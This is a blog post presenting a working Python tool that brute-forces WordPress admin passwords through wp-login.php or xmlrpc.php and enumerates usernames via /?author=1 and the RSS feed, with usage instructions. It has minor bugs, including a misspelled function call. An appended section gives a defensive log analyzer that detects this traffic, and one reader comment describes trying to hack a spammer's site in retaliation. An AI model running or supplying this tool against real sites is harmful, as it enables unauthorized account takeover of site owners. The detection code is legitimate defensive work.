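WordPress brute-force tool in Python

WordPress brute-force tool

1. Driven by command-line parameters.

2. Two built-in brute-force methods: simulating the login request to wp-login, or POSTing the data packet to xmlrpc.php.

3. Built-in automatic username discovery, using two methods: /?author=1 and RSS. Because there are so many WP themes and too few regexes to match them, the result can be inaccurate. I tried it together with a Baidu crawler, and the accuracy was 70%.

4. Create pass.txt in the same directory and you can start running passwords.

Enough talk, here is the code!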

#!/usr/bin/env python
#coding:utf-8
__author__ = 'mtfly'

import requests
import string
import time
import re
from optparse import OptionParser

def crack_xmlrpc(username, password, url):
	crack_url = url + "/xmlrpc.php"
	#print crack_url
	post = '''
		<?xml version="1.0" encoding="iso-8859-1"?>
		<methodCall>
  		<methodName>wp.getUsersBlogs</methodName>
  		<params>
   		<param><value>''' + username + '''</value></param>
   		<param><value>''' + password + '''</value></param>
  		</params>
		</methodCall>'''
	headers = {
		'UserAgent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
		'Referer': crack_url
	}
	try:
		res = requests.post(url=crack_url, data=post, headers=headers, timeout=5).content
		#print "ok"
	except Exception, e:
		print "error", e
	else:
		if '<int>405</int>' in res:
			print "XML-RPC has been disabled. Please use the wp-admin.php"
		elif "faultCode" in res:
			print "The password is not:", password
		elif "isAdmin" in res:
			print "\nThe password is ", password
			exit()

def crack_wp_login(username, password, url):
	crack_url = url + "/wp-login.php"
	#print crack_url
	headers = {
		'UserAgent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
		'Content-Type': 'application/x-www-form-urlencoded'
	}
	post = {'log': username, 'pwd': password}
	try:
		res = requests.post(url=crack_url, data=post, headers=headers, timeout=5).content
	except Exception, e:
		print "error", e
	else:
		if 'lostpassword' in res:
			print "The password is not:", password
		elif "welcome-panel" in res:
			print "\nThe password is ", password
			exit()

def get_author(url):
	get_url0 = url + "/?feed=rss2"
	get_url1 = url + "/?author=1"
	headers = {
		'UserAgent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
	}
	#print get_url
	try:
		res0 = requests.get(get_url0)
		res1 = requests.get(get_url1)
		html0 = res0.content
		html1 = res1.content
		s0 = re.findall('<dc:creator><\!\[CDATA\[(.*?)\]\]><\/dc:creator>',html0)
		s1 = re.findall('<title>(.*?)\s',html1)
		if len(s1) == 0:
			# print "null"
			# print res.url
			s1 = re.findall('author/(.*?)/', res1.url)
		s = s0 +s1
		print "The Username maybe:"
		for i in list(set(s)):
			print i
	except Exception, e:
		print e

p = OptionParser()
p.add_option('-u', '--url', type="string", help='Input the url')
p.add_option('-a', '--admin',default="admin", type="string", help='Input the username')
p.add_option('-g', '--getauthor',default=False, action="store_true", help='Get admin\'username')
p.add_option('-w', '--crack_wp_login',default=False, action="store_true", help='Crack by wp-login')
p.add_option('-x', '--crack_xmlrpc',default=False, action="store_true", help='Crack by xmlrpc')
options, args = p.parse_args()
url = options.url
admin = options.admin
author = options.getauthor
w = options.crack_wp_login
x = options.crack_xmlrpc

# url = "http://mtfly.net"
# url = "http://127.0.0.1/wp/"
print url
if author:
	get_author(url)
	exit()
f = open("pass.txt", "r")
for line in f:
	#print line.strip()
	if w:
		crack_wp_login(admin, line.strip(), url)
	if x:
		crack_xmlrpr(admin, line.strip(), url)
f.close

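Multithreading could also be added; I will add it in a couple of days.

Usage:

Create pass.txt and add the test passwords to it.

-u  followed by the WP URL; remember to include http://

-a  followed by the username; the default is admin

-g  automatically determine the administrator username; accuracy is fairly low. Exits automatically after getting the username.

-w  simulate the admin web login via /wp-login.php

-x  log in by POST to the /xmlrpc.php interface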


Examples:

View the help

Look up the username

Crack the password by simulating the wp-login login; stops running automatically on success

have fun!
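
Seen from the server side, the requests described above (the /?author=1 lookup and repeated POSTs to /wp-login.php or /xmlrpc.php) leave a recognisable pattern in the web access log. The following is an added example, not part of the original post: a small log check, where the function name `analyze`, the threshold of 5, the Combined Log Format input and the 200/302 behaviour of a default WordPress login are assumptions, and the log lines are constructed.

```python
import re
from collections import Counter, defaultdict

# Assumed input: access log in Common/Combined Log Format.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
ENUM_RE = re.compile(r'[?&]author=\d+')  # the /?author=N username lookup

def analyze(lines, threshold=5):
    """Map client IP -> set of findings. threshold is an assumed tuning value."""
    attempts = Counter()
    findings = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, path, status = m.groups()
        base = path.split("?", 1)[0]
        if method == "GET" and ENUM_RE.search(path):
            findings[ip].add("author-enumeration")
        elif method == "POST" and base.endswith("/xmlrpc.php"):
            # XML-RPC answers 200 for good and bad credentials alike,
            # so only the request volume is visible in the log.
            attempts[ip, "xmlrpc"] += 1
            if attempts[ip, "xmlrpc"] >= threshold:
                findings[ip].add("xmlrpc-guessing")
        elif method == "POST" and base.endswith("/wp-login.php"):
            # Assumption: default WordPress re-renders the form (200) on a
            # failed login and redirects (302) on a successful one.
            if status == "302":
                if attempts[ip, "login"] >= threshold:
                    findings[ip].add("login-success-after-guessing")
            else:
                attempts[ip, "login"] += 1
                if attempts[ip, "login"] >= threshold:
                    findings[ip].add("wp-login-guessing")
    return dict(findings)

# Constructed sample log lines (documentation IP ranges), not real traffic.
TS = '[01/Jan/2024:10:00:00 +0000]'
SAMPLE = (
    ['203.0.113.7 - - %s "GET /?author=1 HTTP/1.1" 301 0' % TS]
    + ['203.0.113.7 - - %s "POST /wp-login.php HTTP/1.1" 200 4211' % TS] * 6
    + ['203.0.113.7 - - %s "POST /wp-login.php HTTP/1.1" 302 0' % TS]
    + ['198.51.100.20 - - %s "POST /wp-login.php HTTP/1.1" 302 0' % TS]
    + ['198.51.100.21 - - %s "POST /xmlrpc.php HTTP/1.1" 200 403' % TS] * 5
)

if __name__ == "__main__":
    for ip, found in sorted(analyze(SAMPLE).items()):
        print(ip, sorted(found))
```

The counters here cover the whole input; on a live log they would be bucketed per time window, and a "login-success-after-guessing" finding is the one to act on first, since it means the account password should be reset.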

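4 comments on “WordPress brute-force tool in Python”

  1. Recently a malicious site has been spamming link comments on my WordPress.
    In my anger I clicked through to take a look and, well, it is WordPress too. I got the wicked idea of hacking in and taking it down, but it is a virtual host on a Windows server and WordPress's own defenses are too good, so I could not get in.

  2. Can this get any username and then brute-force the password? It looks like it only gets the administrator's password?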
